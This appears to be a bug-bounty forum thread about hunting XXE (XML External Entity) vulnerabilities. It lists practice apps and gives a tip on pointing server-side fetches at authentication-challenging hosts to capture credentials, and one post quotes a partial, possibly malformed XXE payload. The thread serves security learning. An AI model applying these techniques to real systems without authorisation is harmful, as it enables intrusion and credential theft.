Hunting XXE For Fun And Profit

In one of our most recent “Advice from a Researcher” blogs Ben Sadeghipou wrote a great post on Hunting XXE for fun and profit.

https://blog.bugcrowd.com/advice-from-a-researcher-xxe/

This post talks about a type of critical vulnerability that can be found in web applications, the XML External Entity or as it is better known, XXE.

Please post any questions or comments here that you’d like the Bugcrowd team -including the author- to see.

Thanks!

2 Likes

For those just getting into XXE injection there are a few appsec learning apps for you to use to practice:

Mutilldae:

bWapp:

XMLmao:

Detectify’s XXE via RSS blog:

Happy hacking!

4 Likes

Some more resources from another forum user @jstnkndy :smile:

2 Likes

A couple of tweets on this the other day! Pro-Tips from some very skilled researchers:

2 Likes

any XXE CTF link? thank you

1 Like

There are 3 practice apps listed above in a post of mine =)

1 Like

Just out of interest do any of these enable you to test “XSLT” injections?

I just want to chip in … if you are at the point where you can call external resources I’d recommend pointing your external url towards something configured to challenge for authentication (httpntlm/basic/smb), you’d be surprised how many servers cough up credentials

… I wrote this about it for client/server abuse with authentication in folder paths, the material is kinda old but that’s just because it would be rude of me to talk about where I have seen it recently … and my clients would kick my arse.

this stuff can be applied not just to XXE but to SSRF and any server fetching resources on your behalf/instruction

and it can even be used to attack client side… altho more annoying than anything else, (you’ll get a reward for it most of the time)

https://ctus.io/path-fu-external-authentication-injection/

1 Like

Is the blog post formatting on the payload correct? this part in particular:

<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE testingxxe [

%get %dtd;]>

Seems like the closing tag bracket is missing %get %dtd;]>

My editor says its missing, so I dont know if it was meant like this or if it was a typo.

Can you advise please?

Thanks!!